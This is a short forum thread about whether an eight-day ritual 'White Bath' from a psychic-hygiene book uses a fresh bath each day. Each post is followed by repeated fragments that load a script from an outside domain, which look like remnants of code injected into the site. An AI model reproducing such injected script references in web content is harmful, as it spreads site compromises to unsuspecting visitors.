I'm reading Sophie Reichers "Basic Psychic Hygiene," and she talks about the traditional White Bath taking 8 days. Do you add the herbs to a fresh bath each day, or just add to the same bath water for 8 days? Shes not clear. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It does sound a bit gross staying in a bath for 8 das. Surely she meant get a different bath each day with the same herbs instead of fresh ones? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

have a fresh bath for the 8 days and use a different batch of herbs on each of the days. simple. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
